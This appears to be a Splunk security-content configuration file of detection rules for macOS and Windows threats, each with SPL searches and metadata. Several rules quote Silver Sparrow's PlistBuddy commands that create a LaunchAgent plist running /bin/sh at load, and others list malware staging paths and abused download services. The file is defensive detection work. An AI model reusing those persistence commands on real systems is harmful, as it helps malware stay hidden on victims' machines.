action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.001", "T1543"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a property list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\
- PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \
Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Some legitimate applications may use PlistBuddy to create or modify property lists and possibly generate false positives. Review the property list being modified or created to confirm.
action.escu.creation_date = 2021-02-22
action.escu.modification_date = 2021-02-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious PlistBuddy Usage - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Silver Sparrow"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Suspicious PlistBuddy Usage - Rule
action.correlationsearch.annotations = {"analytic_story": ["Silver Sparrow"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.001", "T1543"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a property list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\
- PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \
Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further.
action.notable.param.rule_title = Suspicious PlistBuddy Usage
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=PlistBuddy (Processes.process=*LaunchAgents* OR Processes.process=*RunAtLoad* OR Processes.process=*true*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_plistbuddy_usage_filter`

[ESCU - Suspicious PlistBuddy Usage via OSquery - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a property list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\
- PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \
Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.001", "T1543"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a property list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\
- PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \
- PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \
Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further.
action.escu.how_to_implement = OSQuery must be installed and configured to pick up process events (info at https://osquery.io) as well as using the Splunk OSQuery Add-on https://splunkbase.splunk.com/app/4402. Modify the macro and validate fields are correct. action.escu.known_false_positives = Some legitimate applications may use PlistBuddy to create or modify property lists and possibly generate false positives. Review the property list being modified or created to confirm. action.escu.creation_date = 2021-02-22 action.escu.modification_date = 2021-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious PlistBuddy Usage via OSquery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Silver Sparrow"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Suspicious PlistBuddy Usage via OSquery - Rule action.correlationsearch.annotations = {"analytic_story": ["Silver Sparrow"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.001", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a properly list (.plist) file. 
In the instance of Silver Sparrow, the following commands were executed:\ - PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \ Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further. action.notable.param.rule_title = Suspicious PlistBuddy Usage via OSquery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `osquery_process` "columns.cmdline"="*LaunchAgents*" OR "columns.cmdline"="*RunAtLoad*" OR "columns.cmdline"="*true*" | `suspicious_plistbuddy_usage_via_osquery_filter` [ESCU - Suspicious Process DNS Query Known Abuse Web Services - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. action.escu.how_to_implement = This detection relies on sysmon logs with the Event ID 22, DNS Query. We suggest you run this detection at least once a day over the last 14 days. action.escu.known_false_positives = Noise and false positive can be seen if the following instant messaging is allowed to use within corporate network. In this case, a filter is needed. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Process DNS Query Known Abuse Web Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Data Destruction", "WhisperGate", "Remcos", "Phemedrone Stealer", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = suspicious process $process_name$ has a dns query in $QueryName$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Process DNS Query Known Abuse Web Services - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate", "Remcos", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. 
A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. action.notable.param.rule_title = Suspicious Process DNS Query Known Abuse Web Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=22 QueryName IN ("*pastebin*", "*discord*", "*api.telegram*","*t.me*") process_name IN ("cmd.exe", "*powershell*", "pwsh.exe", "wscript.exe","cscript.exe") OR Image IN ("*\\users\\public\\*", "*\\programdata\\*", "*\\temp\\*", "*\\Windows\\Tasks\\*", "*\\appdata\\*", "*\\perflogs\\*") | stats count min(_time) as firstTime max(_time) as lastTime by Image QueryName QueryStatus process_name QueryResults Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_dns_query_known_abuse_web_services_filter` [ESCU - Suspicious Process Executed From Container File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious process spawned by another process from within common container/archive file types. This technique was a common technique used by adversaries and malware to execute scripts or evade defenses. This TTP may detect some normal software installation or user behaviors where opening archive files is common. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1204.002", "T1036.008"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious process spawned by another process from within common container/archive file types. 
This technique was a common technique used by adversaries and malware to execute scripts or evade defenses. This TTP may detect some normal software installation or user behaviors where opening archive files is common. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Various business process or userland applications and behavior. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Process Executed From Container File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes", "Amadey", "Remcos", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = A suspicious process $process_name$ was launched from $file_name$ on $dest$. 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 16}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 16}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Process Executed From Container File - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Amadey", "Remcos", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 20, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1204.002", "T1036.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious process spawned by another process from within common container/archive file types. This technique was a common technique used by adversaries and malware to execute scripts or evade defenses. This TTP may detect some normal software installation or user behaviors where opening archive files is common. 
action.notable.param.rule_title = Suspicious Process Executed From Container File action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*.ZIP\\*","*.ISO\\*","*.IMG\\*","*.CAB\\*","*.TAR\\*","*.GZ\\*","*.RAR\\*","*.7Z\\*") AND Processes.action="allowed" by Processes.dest Processes.parent_process Processes.process Processes.user| `drop_dm_object_name(Processes)`| regex process="(?i).*(ZIP|ISO|IMG|CAB|TAR|GZ|RAR|7Z)\\\\.+\.(BAT|BIN|CAB|CMD|COM|CPL|EX_|EXE|GADGET|INF1|INS|INX||HTM|HTML|ISU|JAR|JOB|JS|JSE|LNK|MSC|MSI|MSP|MST|PAF|PIF|PS1|REG|RGS|SCR|SCT|SHB|SHS|U3P|VB|VBE|VBS|VBSCRIPT|WS|WSF|WSH)\"?$" | rex field=process "(?i).+\\\\(?[^\\\]+\.(ZIP|ISO|IMG|CAB|TAR|GZ|RAR|7Z))\\\\((.+\\\\)+)?(?.+\.(BAT|BIN|CAB|CMD|COM|CPL|EX_|EXE|GADGET|INF1|INS|INX||HTM|HTML|ISU|JAR|JOB|JS|JSE|LNK|MSC|MSI|MSP|MST|PAF|PIF|PS1|REG|RGS|SCR|SCT|SHB|SHS|U3P|VB|VBE|VBS|VBSCRIPT|WS|WSF|WSH))\"?$"| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_executed_from_container_file_filter` [ESCU - Suspicious Process File Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious processes running in file paths that are not typically associated with legitimate software. Adversaries often employ this technique to drop and execute malicious executables in accessible locations that do not require administrative privileges. By monitoring for processes running in such unconventional file paths, we can identify potential indicators of compromise and proactively respond to malicious activity. 
This analytic plays a crucial role in enhancing system security by pinpointing suspicious behaviors commonly associated with malware and unauthorized software execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious processes running in file paths that are not typically associated with legitimate software. Adversaries often employ this technique to drop and execute malicious executables in accessible locations that do not require administrative privileges. By monitoring for processes running in such unconventional file paths, we can identify potential indicators of compromise and proactively respond to malicious activity. This analytic plays a crucial role in enhancing system security by pinpointing suspicious behaviors commonly associated with malware and unauthorized software execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may allow execution of specific binaries in non-standard paths. Filter as needed. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Process File Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Double Zero Destructor", "Graceful Wipe Out Attack", "AsyncRAT", "WhisperGate", "Prestige Ransomware", "DarkGate Malware", "AgentTesla", "Brute Ratel C4", "RedLine Stealer", "Rhysida Ransomware", "Swift Slicer", "IcedID", "DarkCrystal RAT", "Chaos Ransomware", "PlugX", "Industroyer2", "Azorult", "Remcos", "XMRig", "Qakbot", "Volt Typhoon", "Hermetic Wiper", "Warzone RAT", "Trickbot", "Amadey", "BlackByte Ransomware", "LockBit Ransomware", "CISA AA23-347A", "Data Destruction", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = Suspicious process $process_name$ running from a suspicious process path- $process_path$ on host- $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"threat_object_field": "process_path", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Process File Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Double Zero Destructor", "Graceful Wipe Out Attack", "AsyncRAT", "WhisperGate", "Prestige Ransomware", "DarkGate Malware", "AgentTesla", "Brute Ratel C4", "RedLine Stealer", "Rhysida Ransomware", "Swift Slicer", "IcedID", "DarkCrystal RAT", "Chaos Ransomware", "PlugX", "Industroyer2", "Azorult", "Remcos", "XMRig", "Qakbot", "Volt Typhoon", 
"Hermetic Wiper", "Warzone RAT", "Trickbot", "Amadey", "BlackByte Ransomware", "LockBit Ransomware", "CISA AA23-347A", "Data Destruction", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious processes running in file paths that are not typically associated with legitimate software. Adversaries often employ this technique to drop and execute malicious executables in accessible locations that do not require administrative privileges. By monitoring for processes running in such unconventional file paths, we can identify potential indicators of compromise and proactively respond to malicious activity. This analytic plays a crucial role in enhancing system security by pinpointing suspicious behaviors commonly associated with malware and unauthorized software execution. 
action.notable.param.rule_title = Suspicious Process File Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_path = "*\\windows\\fonts\\*" OR Processes.process_path = "*\\windows\\temp\\*" OR Processes.process_path = "*\\users\\public\\*" OR Processes.process_path = "*\\windows\\debug\\*" OR Processes.process_path = "*\\Users\\Administrator\\Music\\*" OR Processes.process_path = "*\\Windows\\servicing\\*" OR Processes.process_path = "*\\Users\\Default\\*" OR Processes.process_path = "*Recycle.bin*" OR Processes.process_path = "*\\Windows\\Media\\*" OR Processes.process_path = "\\Windows\\repair\\*" OR Processes.process_path = "*\\temp\\*" OR Processes.process_path = "*\\PerfLogs\\*" by Processes.parent_process_name Processes.parent_process Processes.process_path Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_file_path_filter` [ESCU - Suspicious Process With Discord DNS Query - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a process making a DNS query to Discord, a well known instant messaging and digital distribution platform. Discord can be abused by adversaries, as seen in the WhisperGate campaign, to host and download malicious. external files. A process resolving a Discord DNS name could be an indicator of malware trying to download files from Discord for further execution. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies a process making a DNS query to Discord, a well known instant messaging and digital distribution platform. Discord can be abused by adversaries, as seen in the WhisperGate campaign, to host and download malicious. external files. A process resolving a Discord DNS name could be an indicator of malware trying to download files from Discord for further execution. action.escu.how_to_implement = his detection relies on sysmon logs with the Event ID 22, DNS Query. action.escu.known_false_positives = Noise and false positive can be seen if the following instant messaging is allowed to use within corporate network. In this case, a filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Process With Discord DNS Query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Data Destruction", "WhisperGate"] action.risk = 1 action.risk.param._risk_message = suspicious process $process_name$ has a dns query in $QueryName$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Process With Discord DNS Query - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate"], "cis20": 
["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=22 QueryName IN ("*discord*") Image != "*\\AppData\\Local\\Discord\\*" AND Image != "*\\Program Files*" AND Image != "discord.exe" | stats count min(_time) as firstTime max(_time) as lastTime by Image QueryName QueryStatus process_name QueryResults Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_with_discord_dns_query_filter` [ESCU - Suspicious Reg exe Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for reg.exe being launched from a command prompt not started by the user. When a user launches cmd.exe, the parent process is usually explorer.exe. This search filters out those instances. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for reg.exe being launched from a command prompt not started by the user. When a user launches cmd.exe, the parent process is usually explorer.exe. This search filters out those instances. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It's possible for system administrators to write scripts that exhibit this behavior. If this is the case, the search will need to be modified to filter them out. action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Reg exe Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Disabling Security Tools", "DHS Report TA18-074A"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to add a registry entry. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Reg exe Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Disabling Security Tools", "DHS Report TA18-074A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.parent_process_name != explorer.exe Processes.process_name =cmd.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest Processes.process_id Processes.parent_process_id | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.parent_process_name=cmd.exe Processes.process_name= reg.exe by Processes.parent_process_id Processes.dest Processes.process_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename parent_process_id as process_id |dedup process_id| table 
process_id dest] | `suspicious_reg_exe_process_filter` [ESCU - Suspicious Regsvr32 Register Suspicious Path - Rule] action.escu = 0 action.escu.enabled = 1 description = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code by using non-standard file extensions to load DLLs. Upon investigating, look for network connections to remote destinations (internal or external). Review additional parrallel processes and child processes for additional activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code by using non-standard file extensions to load DLLs. Upon investigating, look for network connections to remote destinations (internal or external). Review additional parrallel processes and child processes for additional activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives with the query restricted to specified paths. Add more world writeable paths as tuning continues. 
